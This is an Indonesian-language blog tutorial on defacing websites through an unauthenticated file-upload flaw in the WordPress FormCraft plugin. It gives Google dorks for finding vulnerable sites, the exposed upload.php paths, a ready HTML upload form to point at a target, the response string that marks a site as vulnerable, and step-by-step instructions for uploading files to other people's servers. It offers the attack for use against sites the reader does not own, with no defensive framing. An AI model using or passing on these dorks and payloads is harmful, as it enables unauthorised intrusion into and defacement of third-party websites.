Deface metode WordPress FormCraft Plugins

Deface metode WordPress FormCraft Plugins

SAZFHI Exploit - Yo what's up bro, Balik lagi dengan admin yg paling tamvan ini :v, di hari ini admin ingin nge share tutorial Deface metode Wordpress Plugins FormCraft nih, CMS Wordpress dengan sejuta bug di plugin nya, oke sok langsung aja ke pembahasan nya.

Bahan Bahan :

• Only File type .txt / .jpg
• Dork :
  - inurl:/wp-content/plugins/formcraft/
  - inurl:/wp-content//plugins/formcraft/file-upload/
  - inurl:/wp-content/plugins/formcraft/ site:.com
• Exploit :
  - /wp-content/plugins/formcraft/file-upload/server/php/upload.php
  - /wp-content/plugins/formcraft/file-upload/server/content/upload.php
• CSRF : Click Me Senpai
• Atau kalian bisa pakai CSRF ini
  <form method="POST" action="http://site.com/wp-content/plugins/formcraft/file-upload/server/php/upload.php"
  enctype="multipart/form-data">
  <input type="file" name="files[]" /><button>Upload</button>
  </form>

Tutorial Deface Wordpress FormCraft Plugins :

1. Langkah pertama kalian dorking dulu pakai dork yang admin kasih.
2. Kalo kalian ketemu site yang ada tulisan {"failed":"No file found 2"} nya Maka website itu Vuln.
   
3. Nah abis itu kalian buka CSRF nya. Trus Kalian isi kolom kolom yg disediain.
   *Kalo kalian pake script CSRF yang admin kasih, kalian edit dulu site.com nya pake site yang ingin kalian deface.
   Contoh :
   - Kolom 1 kalian isi target kalian
   - Kolom 2 kalian isi files[]
   - Langsung aja kalian klik SIMPAN
   
4. Nah pada bagian choose file, kalian pilih file yg mau kalian upload, lalu pencet UPLOAD COK. disini admin bakal nge upload file.txt
   
5. Nah jika berhasil ter upload maka akan muncul cara akses nya, tinggal kalian copy & paste di new tab.
   
6. Dan taraaa file text nya pun terupload....
   

Oke segitu dulu tutorial yang admin berikan. Kalo kalian punya kritik dan saran silakan kalian komen dibawah.
See you next time :)